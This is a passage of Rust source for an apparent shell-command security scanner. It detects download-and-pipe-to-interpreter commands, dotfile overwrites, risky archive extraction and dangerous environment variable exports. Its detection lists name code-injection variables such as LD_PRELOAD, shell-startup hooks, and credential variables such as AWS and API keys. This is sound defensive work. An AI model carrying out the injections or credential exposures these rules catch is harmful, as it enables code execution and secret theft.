tirith_core/rules/
command.rs

1use crate::extract::ScanContext;
2use crate::tokenize::{self, ShellType};
3use crate::verdict::{Evidence, Finding, RuleId, Severity};
4
/// Lowercase base names of every program treated as a script interpreter.
///
/// `is_interpreter()` performs exact-match lookups against this table. Per the
/// original note, a drift test also validates it against the tier-1 regex, so
/// keep both in sync when editing.
pub const INTERPRETERS: &[&str] = &[
    // POSIX-style and alternative Unix shells
    "sh",
    "bash",
    "zsh",
    "dash",
    "ksh",
    "fish",
    "csh",
    "tcsh",
    "ash",
    "mksh",
    // Python
    "python",
    "python2",
    "python3",
    // JavaScript runtimes
    "node",
    "deno",
    "bun",
    // Other scripting languages
    "perl",
    "ruby",
    "php",
    "lua",
    "tclsh",
    "elixir",
    "rscript",
    // PowerShell and Windows command processors
    "pwsh",
    "iex",
    "invoke-expression",
    "cmd",
];
36
/// Decode a numeric escape starting at `chars[*i]`.
///
/// Consumes at most `max_digits` characters accepted by `predicate`, advancing
/// `*i` past each one, then interprets the consumed run as a base-`radix`
/// number and converts it to a `char`.
///
/// Returns `None` when no digit was consumed, or when the value is not a valid
/// Unicode scalar value (in which case the digits have still been consumed).
/// Works on a fixed 8-byte stack buffer, so `max_digits` must not exceed 8.
fn parse_numeric_escape(
    chars: &[char],
    i: &mut usize,
    max_digits: usize,
    radix: u32,
    predicate: fn(&char) -> bool,
) -> Option<char> {
    let mut digits = [0u8; 8];
    let mut count = 0;
    while count < max_digits {
        match chars.get(*i) {
            Some(c) if predicate(c) => {
                digits[count] = *c as u8;
                count += 1;
                *i += 1;
            }
            _ => break,
        }
    }
    if count == 0 {
        return None;
    }
    std::str::from_utf8(&digits[..count])
        .ok()
        .and_then(|text| u32::from_str_radix(text, radix).ok())
        .and_then(char::from_u32)
}
65
66/// Strip all shell quoting/escaping from a token, producing the effective string
67/// the shell would see after expansion.
68///
69/// Handles: single quotes, double quotes, ANSI-C quoting (`$'...'`), backslash
70/// escaping (POSIX) and backtick escaping (PowerShell).
71fn normalize_shell_token(input: &str, shell: ShellType) -> String {
72    #[derive(PartialEq)]
73    enum QState {
74        Normal,
75        Single,
76        Double,
77        AnsiC,
78    }
79
80    let chars: Vec<char> = input.chars().collect();
81    let len = chars.len();
82    let mut out = String::with_capacity(len);
83    let mut i = 0;
84    let is_ps = matches!(shell, ShellType::PowerShell);
85    let is_cmd = matches!(shell, ShellType::Cmd);
86    let mut state = QState::Normal;
87
88    while i < len {
89        match state {
90            QState::Normal => {
91                let ch = chars[i];
92                if is_cmd && ch == '^' && i + 1 < len {
93                    // Cmd caret escape: skip caret, take next char literal
94                    out.push(chars[i + 1]);
95                    i += 2;
96                } else if !is_ps && !is_cmd && ch == '\\' && i + 1 < len {
97                    // POSIX backslash escape: skip backslash, take next char literal
98                    out.push(chars[i + 1]);
99                    i += 2;
100                } else if is_ps && ch == '`' && i + 1 < len {
101                    // PowerShell backtick escape
102                    out.push(chars[i + 1]);
103                    i += 2;
104                } else if ch == '\'' && !is_cmd {
105                    state = QState::Single;
106                    i += 1;
107                } else if ch == '"' {
108                    state = QState::Double;
109                    i += 1;
110                } else if shell == ShellType::Posix
111                    && ch == '$'
112                    && i + 1 < len
113                    && chars[i + 1] == '\''
114                {
115                    state = QState::AnsiC;
116                    i += 2;
117                } else {
118                    out.push(ch);
119                    i += 1;
120                }
121            }
122            // SINGLE_QUOTE: everything literal until closing '
123            QState::Single => {
124                if chars[i] == '\'' {
125                    // PowerShell: '' inside single quotes is an escaped literal '
126                    if is_ps && i + 1 < len && chars[i + 1] == '\'' {
127                        out.push('\'');
128                        i += 2;
129                    } else {
130                        state = QState::Normal;
131                        i += 1;
132                    }
133                } else {
134                    out.push(chars[i]);
135                    i += 1;
136                }
137            }
138            // DOUBLE_QUOTE
139            QState::Double => {
140                if chars[i] == '"' {
141                    state = QState::Normal;
142                    i += 1;
143                } else if !is_ps && chars[i] == '\\' && i + 1 < len {
144                    // POSIX: only \", \\, \$, \` are special inside double quotes
145                    let next = chars[i + 1];
146                    if next == '"' || next == '\\' || next == '$' || next == '`' {
147                        out.push(next);
148                        i += 2;
149                    } else {
150                        // literal backslash
151                        out.push('\\');
152                        out.push(next);
153                        i += 2;
154                    }
155                } else if is_ps && chars[i] == '`' && i + 1 < len {
156                    // PowerShell backtick escape inside double quotes
157                    out.push(chars[i + 1]);
158                    i += 2;
159                } else {
160                    out.push(chars[i]);
161                    i += 1;
162                }
163            }
164            // ANSIC_QUOTE (POSIX only): decode escape sequences
165            QState::AnsiC => {
166                if chars[i] == '\'' {
167                    state = QState::Normal;
168                    i += 1;
169                } else if chars[i] == '\\' && i + 1 < len {
170                    let esc = chars[i + 1];
171                    match esc {
172                        'n' => {
173                            out.push('\n');
174                            i += 2;
175                        }
176                        't' => {
177                            out.push('\t');
178                            i += 2;
179                        }
180                        'r' => {
181                            out.push('\r');
182                            i += 2;
183                        }
184                        '\\' => {
185                            out.push('\\');
186                            i += 2;
187                        }
188                        '\'' => {
189                            out.push('\'');
190                            i += 2;
191                        }
192                        '"' => {
193                            out.push('"');
194                            i += 2;
195                        }
196                        'a' => {
197                            out.push('\x07');
198                            i += 2;
199                        }
200                        'b' => {
201                            out.push('\x08');
202                            i += 2;
203                        }
204                        'e' | 'E' => {
205                            out.push('\x1b');
206                            i += 2;
207                        }
208                        'f' => {
209                            out.push('\x0c');
210                            i += 2;
211                        }
212                        'v' => {
213                            out.push('\x0b');
214                            i += 2;
215                        }
216                        'x' => {
217                            // \xHH — 1 or 2 hex digits
218                            i += 2;
219                            if let Some(c) =
220                                parse_numeric_escape(&chars, &mut i, 2, 16, char::is_ascii_hexdigit)
221                            {
222                                out.push(c);
223                            }
224                        }
225                        'u' => {
226                            // \uHHHH — 1 to 4 hex digits
227                            i += 2;
228                            if let Some(c) =
229                                parse_numeric_escape(&chars, &mut i, 4, 16, char::is_ascii_hexdigit)
230                            {
231                                out.push(c);
232                            }
233                        }
234                        'U' => {
235                            // \UHHHHHHHH — 1 to 8 hex digits
236                            i += 2;
237                            if let Some(c) =
238                                parse_numeric_escape(&chars, &mut i, 8, 16, char::is_ascii_hexdigit)
239                            {
240                                out.push(c);
241                            }
242                        }
243                        c if c.is_ascii_digit() && c <= '7' => {
244                            // \NNN octal — 1 to 3 octal digits
245                            i += 1; // skip backslash
246                            if let Some(c) = parse_numeric_escape(&chars, &mut i, 3, 8, |c| {
247                                c.is_ascii_digit() && *c <= '7'
248                            }) {
249                                out.push(c);
250                            }
251                        }
252                        _ => {
253                            // Unknown escape: emit literal
254                            out.push('\\');
255                            out.push(esc);
256                            i += 2;
257                        }
258                    }
259                } else {
260                    out.push(chars[i]);
261                    i += 1;
262                }
263            }
264        }
265    }
266    out
267}
268
269/// Extract the effective command base name from a raw token.
270///
271/// Normalize → path basename → first word → lowercase → strip .exe
272fn normalize_cmd_base(raw: &str, shell: ShellType) -> String {
273    let normalized = normalize_shell_token(raw.trim(), shell);
274    basename_from_normalized(&normalized, shell)
275}
276
277/// Extract basename from an already-normalized (unquoted) string.
278/// Handles path separators, first-word extraction, lowercasing, and .exe stripping.
279fn basename_from_normalized(normalized: &str, shell: ShellType) -> String {
280    let has_path_sep = match shell {
281        ShellType::PowerShell | ShellType::Cmd => {
282            normalized.contains('/') || normalized.contains('\\')
283        }
284        _ => normalized.contains('/'),
285    };
286    let after_path = if has_path_sep {
287        match shell {
288            ShellType::PowerShell | ShellType::Cmd => {
289                normalized.rsplit(['/', '\\']).next().unwrap_or(normalized)
290            }
291            _ => normalized.rsplit('/').next().unwrap_or(normalized),
292        }
293    } else {
294        normalized
295    };
296    let first_word = after_path.split_whitespace().next().unwrap_or("");
297    let lower = first_word.to_lowercase();
298    if lower.ends_with(".exe") {
299        lower[..lower.len() - 4].to_string()
300    } else {
301        lower
302    }
303}
304
305fn is_interpreter(cmd: &str) -> bool {
306    INTERPRETERS.contains(&cmd)
307}
308
309/// Run command-shape rules.
310pub fn check(
311    input: &str,
312    shell: ShellType,
313    cwd: Option<&str>,
314    scan_context: ScanContext,
315) -> Vec<Finding> {
316    let mut findings = Vec::new();
317    let segments = tokenize::tokenize(input, shell);
318
319    // Check for pipe-to-interpreter patterns
320    let has_pipe = segments.iter().any(|s| {
321        s.preceding_separator.as_deref() == Some("|")
322            || s.preceding_separator.as_deref() == Some("|&")
323    });
324    if has_pipe {
325        check_pipe_to_interpreter(&segments, shell, &mut findings);
326    }
327
328    // Check for insecure TLS flags in source commands
329    for segment in &segments {
330        if let Some(ref cmd) = segment.command {
331            let cmd_base = normalize_cmd_base(cmd, shell);
332            if is_source_command(&cmd_base) {
333                let tls_findings =
334                    crate::rules::transport::check_insecure_flags(&segment.args, true);
335                findings.extend(tls_findings);
336            }
337        }
338    }
339
340    // Check for dotfile overwrites
341    check_dotfile_overwrite(&segments, &mut findings);
342
343    // Check for archive extraction to sensitive paths
344    check_archive_extract(&segments, &mut findings);
345
346    // Check for cargo install/add without supply-chain audit (exec-only)
347    if scan_context == ScanContext::Exec {
348        check_vet_not_configured(&segments, cwd, &mut findings);
349    }
350
351    // Check for dangerous environment variable exports
352    check_env_var_in_command(&segments, &mut findings);
353
354    // Check for network destination access (metadata endpoints, private networks)
355    check_network_destination(&segments, &mut findings);
356
357    findings
358}
359
360/// Resolve the effective interpreter from a segment, handling all quoting forms,
361/// wrappers (sudo, env, command, exec, nohup), subshells, and brace groups.
362fn resolve_interpreter_name(seg: &tokenize::Segment, shell: ShellType) -> Option<String> {
363    if let Some(ref cmd) = seg.command {
364        let cmd_base = normalize_cmd_base(cmd, shell);
365
366        // Direct interpreter
367        if is_interpreter(&cmd_base) {
368            return Some(cmd_base);
369        }
370
371        // Subshell: (bash) → strip parens, check
372        let stripped = cmd_base.trim_start_matches('(').trim_end_matches(')');
373        if stripped != cmd_base && is_interpreter(stripped) {
374            return Some(stripped.to_string());
375        }
376
377        // Brace group: { → first arg is command
378        if cmd_base == "{" {
379            return resolve_from_args(&seg.args, shell);
380        }
381
382        // Known wrappers
383        match cmd_base.as_str() {
384            "sudo" => return resolve_sudo_args(&seg.args, shell),
385            "env" => return resolve_env_args(&seg.args, shell),
386            "command" | "exec" | "nohup" => {
387                return resolve_wrapper_args(&seg.args, &cmd_base, shell);
388            }
389            _ => {}
390        }
391    }
392    None
393}
394
/// Selects which argument grammar `resolve_with_parser` applies next.
#[derive(Clone, Copy)]
enum ResolverParser {
    /// Plain argument list: skip flags/assignments, then expect a command.
    Generic,
    /// Arguments following `sudo`.
    Sudo,
    /// Arguments following `env`.
    Env,
    /// Arguments following the `command` builtin.
    Command,
    /// Arguments following `exec`.
    Exec,
    /// Arguments following `nohup`.
    Nohup,
}
404
405enum ResolveStep<'a> {
406    Found(String),
407    Next {
408        parser: ResolverParser,
409        args: &'a [String],
410        inspected: usize,
411    },
412    Stop,
413}
414
415/// Resolve interpreter from a generic arg list. Uses an iterative parser with a
416/// token-inspection budget so deeply nested wrappers cannot bypass detection.
417fn resolve_from_args(args: &[String], shell: ShellType) -> Option<String> {
418    resolve_with_parser(args, shell, ResolverParser::Generic)
419}
420
421fn resolve_sudo_args(args: &[String], shell: ShellType) -> Option<String> {
422    resolve_with_parser(args, shell, ResolverParser::Sudo)
423}
424
425fn resolve_env_args(args: &[String], shell: ShellType) -> Option<String> {
426    resolve_with_parser(args, shell, ResolverParser::Env)
427}
428
429fn resolve_wrapper_args(args: &[String], wrapper: &str, shell: ShellType) -> Option<String> {
430    let parser = match wrapper {
431        "command" => ResolverParser::Command,
432        "exec" => ResolverParser::Exec,
433        "nohup" => ResolverParser::Nohup,
434        _ => ResolverParser::Command,
435    };
436    resolve_with_parser(args, shell, parser)
437}
438
439fn resolve_with_parser(
440    args: &[String],
441    shell: ShellType,
442    start_parser: ResolverParser,
443) -> Option<String> {
444    if args.is_empty() {
445        return None;
446    }
447
448    let mut parser = start_parser;
449    let mut current = args;
450    // Budget scales with input size and keeps resolution bounded even on adversarial inputs.
451    let mut budget = args.len().saturating_mul(4).saturating_add(8);
452
453    while budget > 0 && !current.is_empty() {
454        let step = match parser {
455            ResolverParser::Generic => resolve_step_generic(current, shell),
456            ResolverParser::Sudo => resolve_step_sudo(current, shell),
457            ResolverParser::Env => resolve_step_env(current, shell),
458            ResolverParser::Command => resolve_step_wrapper(current, shell, "command"),
459            ResolverParser::Exec => resolve_step_wrapper(current, shell, "exec"),
460            ResolverParser::Nohup => resolve_step_wrapper(current, shell, "nohup"),
461        };
462
463        match step {
464            ResolveStep::Found(interpreter) => return Some(interpreter),
465            ResolveStep::Stop => return None,
466            ResolveStep::Next {
467                parser: next_parser,
468                args: next_args,
469                inspected,
470            } => {
471                parser = next_parser;
472                current = next_args;
473                budget = budget.saturating_sub(inspected.max(1));
474            }
475        }
476    }
477    None
478}
479
480fn resolve_step_generic<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
481    let mut idx = 0;
482    let mut seen_dashdash = false;
483    while idx < args.len() {
484        let raw = args[idx].trim();
485        let normalized = normalize_shell_token(raw, shell);
486
487        // Track end-of-options marker
488        if normalized == "--" {
489            seen_dashdash = true;
490            idx += 1;
491            continue;
492        }
493
494        // Skip flags and assignments (only before --)
495        if !seen_dashdash
496            && (normalized.starts_with("--")
497                || normalized.starts_with('-')
498                || normalized.contains('='))
499        {
500            idx += 1;
501            continue;
502        }
503
504        let base = basename_from_normalized(&normalized, shell);
505        return match base.as_str() {
506            "sudo" => ResolveStep::Next {
507                parser: ResolverParser::Sudo,
508                args: &args[idx + 1..],
509                inspected: idx + 1,
510            },
511            "env" => ResolveStep::Next {
512                parser: ResolverParser::Env,
513                args: &args[idx + 1..],
514                inspected: idx + 1,
515            },
516            "command" => ResolveStep::Next {
517                parser: ResolverParser::Command,
518                args: &args[idx + 1..],
519                inspected: idx + 1,
520            },
521            "exec" => ResolveStep::Next {
522                parser: ResolverParser::Exec,
523                args: &args[idx + 1..],
524                inspected: idx + 1,
525            },
526            "nohup" => ResolveStep::Next {
527                parser: ResolverParser::Nohup,
528                args: &args[idx + 1..],
529                inspected: idx + 1,
530            },
531            _ if is_interpreter(&base) => ResolveStep::Found(base),
532            _ => ResolveStep::Stop,
533        };
534    }
535    ResolveStep::Stop
536}
537
538fn resolve_step_sudo<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
539    let value_short_flags = ["-u", "-g", "-C", "-D", "-R", "-T"];
540    let value_long_flags = [
541        "--user",
542        "--group",
543        "--close-from",
544        "--chdir",
545        "--role",
546        "--type",
547        "--other-user",
548        "--host",
549        "--timeout",
550    ];
551
552    let mut idx = 0;
553    while idx < args.len() {
554        let raw = args[idx].trim();
555        let normalized = normalize_shell_token(raw, shell);
556        // -- ends option parsing; remaining args are the command
557        if normalized == "--" {
558            return ResolveStep::Next {
559                parser: ResolverParser::Generic,
560                args: &args[(idx + 1).min(args.len())..],
561                inspected: idx + 1,
562            };
563        }
564        if normalized.starts_with("--") {
565            if value_long_flags.iter().any(|f| normalized == *f) {
566                idx += 2;
567                continue;
568            }
569            if let Some((key, _)) = normalized.split_once('=') {
570                if value_long_flags.contains(&key) {
571                    idx += 1;
572                    continue;
573                }
574            }
575            // Unknown long flag: treat as boolean.
576            idx += 1;
577            continue;
578        }
579        if normalized.starts_with('-') {
580            if value_short_flags.iter().any(|f| normalized == *f) {
581                // Exact match: e.g. -u → next arg is the value
582                idx += 2;
583            } else if normalized.len() > 2
584                && value_short_flags.iter().any(|f| {
585                    normalized.ends_with(&f[1..]) // last char matches value-flag letter
586                })
587            {
588                // Combined short flags: e.g. -iu → -i + -u, last flag takes a value
589                idx += 2;
590            } else {
591                idx += 1;
592            }
593            continue;
594        }
595        return ResolveStep::Next {
596            parser: ResolverParser::Generic,
597            args: &args[idx..],
598            inspected: idx + 1,
599        };
600    }
601    ResolveStep::Stop
602}
603
604fn resolve_step_env<'a>(args: &'a [String], shell: ShellType) -> ResolveStep<'a> {
605    let value_short_flags = ["-u", "-C"];
606    let value_long_flags = [
607        "--unset",
608        "--chdir",
609        "--split-string",
610        "--block-signal",
611        "--default-signal",
612        "--ignore-signal",
613    ];
614
615    let mut idx = 0;
616    while idx < args.len() {
617        let raw = args[idx].trim();
618        let normalized = normalize_shell_token(raw, shell);
619        // -- ends option parsing; remaining args are the command
620        if normalized == "--" {
621            return ResolveStep::Next {
622                parser: ResolverParser::Generic,
623                args: &args[(idx + 1).min(args.len())..],
624                inspected: idx + 1,
625            };
626        }
627        if normalized.starts_with("--") {
628            // --split-string: value is a command string.
629            if normalized == "--split-string" {
630                if idx + 1 < args.len() {
631                    let base = normalize_cmd_base(&args[idx + 1], shell);
632                    if is_interpreter(&base) {
633                        return ResolveStep::Found(base);
634                    }
635                }
636                idx += 2;
637                continue;
638            }
639            if let Some(val) = normalized.strip_prefix("--split-string=") {
640                let base = normalize_cmd_base(val, shell);
641                if is_interpreter(&base) {
642                    return ResolveStep::Found(base);
643                }
644                idx += 1;
645                continue;
646            }
647            if value_long_flags.iter().any(|f| normalized == *f) {
648                idx += 2;
649                continue;
650            }
651            if let Some((key, _)) = normalized.split_once('=') {
652                if value_long_flags.contains(&key) {
653                    idx += 1;
654                    continue;
655                }
656            }
657            // Unknown long flag: treat as boolean.
658            idx += 1;
659            continue;
660        }
661        if normalized == "-S" {
662            // -S: value is a command string.
663            if idx + 1 < args.len() {
664                let base = normalize_cmd_base(&args[idx + 1], shell);
665                if is_interpreter(&base) {
666                    return ResolveStep::Found(base);
667                }
668            }
669            idx += 2;
670            continue;
671        }
672        if normalized.starts_with('-') {
673            if value_short_flags.iter().any(|f| normalized == *f) {
674                idx += 2;
675            } else {
676                idx += 1;
677            }
678            continue;
679        }
680        if normalized.contains('=') {
681            idx += 1;
682            continue;
683        }
684        return ResolveStep::Next {
685            parser: ResolverParser::Generic,
686            args: &args[idx..],
687            inspected: idx + 1,
688        };
689    }
690    ResolveStep::Stop
691}
692
693fn resolve_step_wrapper<'a>(
694    args: &'a [String],
695    shell: ShellType,
696    wrapper: &str,
697) -> ResolveStep<'a> {
698    let value_flags: &[&str] = match wrapper {
699        "exec" => &["-a"],
700        _ => &[],
701    };
702
703    let mut idx = 0;
704    while idx < args.len() {
705        let raw = args[idx].trim();
706        let normalized = normalize_shell_token(raw, shell);
707        // -- ends option parsing; remaining args are the command
708        if normalized == "--" {
709            return ResolveStep::Next {
710                parser: ResolverParser::Generic,
711                args: &args[(idx + 1).min(args.len())..],
712                inspected: idx + 1,
713            };
714        }
715        if normalized.starts_with("--") || normalized.starts_with('-') {
716            if value_flags.iter().any(|f| normalized == *f) {
717                idx += 2;
718            } else {
719                idx += 1;
720            }
721            continue;
722        }
723        return ResolveStep::Next {
724            parser: ResolverParser::Generic,
725            args: &args[idx..],
726            inspected: idx + 1,
727        };
728    }
729    ResolveStep::Stop
730}
731
732fn check_pipe_to_interpreter(
733    segments: &[tokenize::Segment],
734    shell: ShellType,
735    findings: &mut Vec<Finding>,
736) {
737    for (i, seg) in segments.iter().enumerate() {
738        if i == 0 {
739            continue;
740        }
741        if let Some(sep) = &seg.preceding_separator {
742            if sep == "|" || sep == "|&" {
743                if let Some(interpreter) = resolve_interpreter_name(seg, shell) {
744                    // i > 0 is guaranteed — the loop skips i == 0 above.
745                    let source = &segments[i - 1];
746                    let source_cmd_ref = source.command.as_deref().unwrap_or("unknown");
747                    let source_base = normalize_cmd_base(source_cmd_ref, shell);
748
749                    // Skip if the source is tirith itself — its output is trusted.
750                    if source_base == "tirith" {
751                        continue;
752                    }
753
754                    let rule_id = match source_base.as_str() {
755                        "curl" => RuleId::CurlPipeShell,
756                        "wget" => RuleId::WgetPipeShell,
757                        "http" | "https" => RuleId::HttpiePipeShell,
758                        "xh" => RuleId::XhPipeShell,
759                        _ => RuleId::PipeToInterpreter,
760                    };
761
762                    let display_cmd = seg.command.as_deref().unwrap_or(&interpreter);
763
764                    let base_desc = format!(
765                        "Command pipes output from '{source_base}' directly to \
766                         interpreter '{interpreter}'. Downloaded content will be \
767                         executed without inspection."
768                    );
769
770                    let description = if is_url_fetch_command(&source_base) {
771                        let show_tirith_run = cfg!(unix)
772                            && supports_tirith_run_hint(&source_base)
773                            && shell != ShellType::PowerShell;
774                        if let Some(url) = extract_url_from_args(&source.args, shell)
775                            .map(|u| sanitize_url_for_display(&u))
776                        {
777                            if show_tirith_run {
778                                format!(
779                                    "{base_desc}\n  Safer: tirith run {url}  \
780                                     \u{2014} or: vet {url}  (https://getvet.sh)"
781                                )
782                            } else {
783                                format!(
784                                    "{base_desc}\n  Safer: vet {url}  \
785                                     (https://getvet.sh)"
786                                )
787                            }
788                        } else if show_tirith_run {
789                            format!(
790                                "{base_desc}\n  Safer: use 'tirith run <url>' \
791                                 or 'vet <url>' (https://getvet.sh) to inspect \
792                                 before executing."
793                            )
794                        } else {
795                            format!(
796                                "{base_desc}\n  Safer: use 'vet <url>' \
797                                 (https://getvet.sh) to inspect before executing."
798                            )
799                        }
800                    } else {
801                        base_desc
802                    };
803
804                    findings.push(Finding {
805                        rule_id,
806                        severity: Severity::High,
807                        title: format!("Pipe to interpreter: {source_cmd_ref} | {display_cmd}"),
808                        description,
809                        evidence: vec![Evidence::CommandPattern {
810                            pattern: "pipe to interpreter".to_string(),
811                            matched: format!("{} | {}", source.raw, seg.raw),
812                        }],
813                        human_view: None,
814                        agent_view: None,
815                        mitre_id: None,
816                        custom_rule_id: None,
817                    });
818                }
819            }
820        }
821    }
822}
823
824fn check_dotfile_overwrite(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
825    for segment in segments {
826        // Check for redirects to dotfiles
827        let raw = &segment.raw;
828        if (raw.contains("> ~/.")
829            || raw.contains("> $HOME/.")
830            || raw.contains(">> ~/.")
831            || raw.contains(">> $HOME/."))
832            && !raw.contains("> /dev/null")
833        {
834            findings.push(Finding {
835                rule_id: RuleId::DotfileOverwrite,
836                severity: Severity::High,
837                title: "Dotfile overwrite detected".to_string(),
838                description: "Command redirects output to a dotfile in the home directory, which could overwrite shell configuration".to_string(),
839                evidence: vec![Evidence::CommandPattern {
840                    pattern: "redirect to dotfile".to_string(),
841                    matched: raw.clone(),
842                }],
843                human_view: None,
844                agent_view: None,
845                mitre_id: None,
846                custom_rule_id: None,
847            });
848        }
849    }
850}
851
852fn check_archive_extract(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
853    for segment in segments {
854        if let Some(ref cmd) = segment.command {
855            let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
856            if cmd_base == "tar" || cmd_base == "unzip" || cmd_base == "7z" {
857                // Check if extracting to a sensitive directory
858                let raw = &segment.raw;
859                let sensitive_targets = [
860                    "-C /",
861                    "-C ~/",
862                    "-C $HOME/",
863                    "-d /",
864                    "-d ~/",
865                    "-d $HOME/",
866                    "> ~/.",
867                    ">> ~/.",
868                ];
869                for target in &sensitive_targets {
870                    if raw.contains(target) {
871                        findings.push(Finding {
872                            rule_id: RuleId::ArchiveExtract,
873                            severity: Severity::Medium,
874                            title: "Archive extraction to sensitive path".to_string(),
875                            description: format!(
876                                "Archive command '{cmd_base}' extracts to a potentially sensitive location"
877                            ),
878                            evidence: vec![Evidence::CommandPattern {
879                                pattern: "archive extract".to_string(),
880                                matched: raw.clone(),
881                            }],
882                            human_view: None,
883                            agent_view: None,
884                mitre_id: None,
885                custom_rule_id: None,
886                        });
887                        return;
888                    }
889                }
890            }
891        }
892    }
893}
894
895// ---------------------------------------------------------------------------
896// Phase 8: Dangerous environment variable detection
897// ---------------------------------------------------------------------------
898
899/// Environment variables that enable arbitrary code injection via dynamic linker.
900const CODE_INJECTION_VARS: &[&str] = &[
901    "LD_PRELOAD",
902    "LD_LIBRARY_PATH",
903    "LD_AUDIT",
904    "DYLD_INSERT_LIBRARIES",
905    "DYLD_LIBRARY_PATH",
906];
907
908/// Environment variables that cause arbitrary script execution at shell startup.
909const SHELL_INJECTION_VARS: &[&str] = &["BASH_ENV", "ENV", "PROMPT_COMMAND"];
910
911/// Environment variables that hijack interpreter module/library search paths.
912const INTERPRETER_HIJACK_VARS: &[&str] = &["PYTHONPATH", "NODE_OPTIONS", "RUBYLIB", "PERL5LIB"];
913
914/// Sensitive credential variable names that should not be exported in commands.
915const SENSITIVE_KEY_VARS: &[&str] = &[
916    "AWS_ACCESS_KEY_ID",
917    "AWS_SECRET_ACCESS_KEY",
918    "AWS_SESSION_TOKEN",
919    "OPENAI_API_KEY",
920    "ANTHROPIC_API_KEY",
921    "GITHUB_TOKEN",
922];
923
924fn classify_env_var(name: &str) -> Option<(RuleId, Severity, &'static str, &'static str)> {
925    let name_upper = name.to_ascii_uppercase();
926    let name = name_upper.as_str();
927    if CODE_INJECTION_VARS.contains(&name) {
928        Some((
929            RuleId::CodeInjectionEnv,
930            Severity::Critical,
931            "Code injection environment variable",
932            "can inject shared libraries into all processes, enabling arbitrary code execution",
933        ))
934    } else if SHELL_INJECTION_VARS.contains(&name) {
935        Some((
936            RuleId::ShellInjectionEnv,
937            Severity::Critical,
938            "Shell injection environment variable",
939            "can cause arbitrary script execution at shell startup",
940        ))
941    } else if INTERPRETER_HIJACK_VARS.contains(&name) {
942        Some((
943            RuleId::InterpreterHijackEnv,
944            Severity::High,
945            "Interpreter hijack environment variable",
946            "can hijack the interpreter's module/library search path",
947        ))
948    } else if SENSITIVE_KEY_VARS.contains(&name) {
949        Some((
950            RuleId::SensitiveEnvExport,
951            Severity::High,
952            "Sensitive credential exported",
953            "exposes a sensitive credential that may be logged in shell history",
954        ))
955    } else {
956        None
957    }
958}
959
/// Cargo flags that take their value as a separate, following token.
const CARGO_VALUE_FLAGS: &[&str] = &[
    "-Z",
    "-C",
    "--config",
    "--manifest-path",
    "--color",
    "--target-dir",
    "--target",
];

/// Decide whether a cargo invocation's subcommand is `install` or `add`.
///
/// `args` are the tokens after `cargo`. Toolchain selectors (`+nightly`), flags,
/// and the values of the flags in `CARGO_VALUE_FLAGS` are skipped; the first
/// remaining token is taken as the subcommand. Returns `false` when no
/// subcommand is found.
fn is_cargo_install_or_add(args: &[String]) -> bool {
    let mut tokens = args.iter().map(String::as_str);
    while let Some(token) = tokens.next() {
        // Toolchain selector such as `+nightly` or `+stable`.
        if token.starts_with('+') {
            continue;
        }
        // `--flag=value` carries its value inline, so nothing else is consumed.
        if token.starts_with("--") && token.contains('=') {
            continue;
        }
        // A value-taking flag also swallows the token that follows it.
        if CARGO_VALUE_FLAGS.contains(&token) {
            tokens.next();
            continue;
        }
        // Any other flag (`--locked`, `-v`, ...).
        if token.starts_with('-') {
            continue;
        }
        // First positional token is the subcommand.
        return matches!(token, "install" | "add");
    }
    false
}
1002
1003/// Warn when `cargo install/add` is used and no supply-chain audit directory exists.
1004fn check_vet_not_configured(
1005    segments: &[tokenize::Segment],
1006    cwd: Option<&str>,
1007    findings: &mut Vec<Finding>,
1008) {
1009    let is_cargo_install = segments.iter().any(|s| {
1010        if let Some(ref cmd) = s.command {
1011            let base = cmd
1012                .rsplit(['/', '\\'])
1013                .next()
1014                .unwrap_or(cmd)
1015                .to_ascii_lowercase();
1016            let base = base.strip_suffix(".exe").unwrap_or(&base);
1017            if base == "cargo" {
1018                return is_cargo_install_or_add(&s.args);
1019            }
1020        }
1021        false
1022    });
1023    if !is_cargo_install {
1024        return;
1025    }
1026
1027    // Check if supply-chain/ config exists relative to the analysis context cwd.
1028    // Require an explicit cwd — without one we cannot reliably check the filesystem.
1029    let cwd = match cwd {
1030        Some(dir) => dir,
1031        None => return,
1032    };
1033    let check_path = std::path::PathBuf::from(cwd).join("supply-chain/config.toml");
1034    if check_path.exists() {
1035        return;
1036    }
1037
1038    findings.push(Finding {
1039        rule_id: RuleId::VetNotConfigured,
1040        severity: Severity::Low,
1041        title: "No supply-chain audit configured".into(),
1042        description: "Consider running `cargo vet init` to enable dependency auditing.".into(),
1043        evidence: vec![],
1044        human_view: None,
1045        agent_view: None,
1046        mitre_id: None,
1047        custom_rule_id: None,
1048    });
1049}
1050
1051fn check_env_var_in_command(segments: &[tokenize::Segment], findings: &mut Vec<Finding>) {
1052    for segment in segments {
1053        let Some(ref cmd) = segment.command else {
1054            continue;
1055        };
1056        let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd).to_lowercase();
1057
1058        match cmd_base.as_str() {
1059            "export" => {
1060                for arg in &segment.args {
1061                    if let Some((var_name, value)) = arg.split_once('=') {
1062                        emit_env_finding(var_name.trim(), value, findings);
1063                    }
1064                }
1065            }
1066            "env" => {
1067                for arg in &segment.args {
1068                    let trimmed = arg.trim();
1069                    if trimmed.starts_with('-') {
1070                        continue;
1071                    }
1072                    if let Some((var_name, value)) = trimmed.split_once('=') {
1073                        emit_env_finding(var_name.trim(), value, findings);
1074                    }
1075                }
1076            }
1077            "set" => {
1078                // Fish shell: set [-gx] VAR_NAME value...
1079                let mut var_name: Option<&str> = None;
1080                let mut value_parts: Vec<&str> = Vec::new();
1081                for arg in &segment.args {
1082                    let trimmed = arg.trim();
1083                    if trimmed.starts_with('-') && var_name.is_none() {
1084                        continue;
1085                    }
1086                    if var_name.is_none() {
1087                        var_name = Some(trimmed);
1088                    } else {
1089                        value_parts.push(trimmed);
1090                    }
1091                }
1092                if let Some(name) = var_name {
1093                    emit_env_finding(name, &value_parts.join(" "), findings);
1094                }
1095            }
1096            _ => {}
1097        }
1098    }
1099}
1100
1101fn emit_env_finding(var_name: &str, value: &str, findings: &mut Vec<Finding>) {
1102    let Some((rule_id, severity, title_prefix, desc_suffix)) = classify_env_var(var_name) else {
1103        return;
1104    };
1105    let value_preview = redact_env_value(value);
1106    findings.push(Finding {
1107        rule_id,
1108        severity,
1109        title: format!("{title_prefix}: {var_name}"),
1110        description: format!("Setting {var_name} {desc_suffix}"),
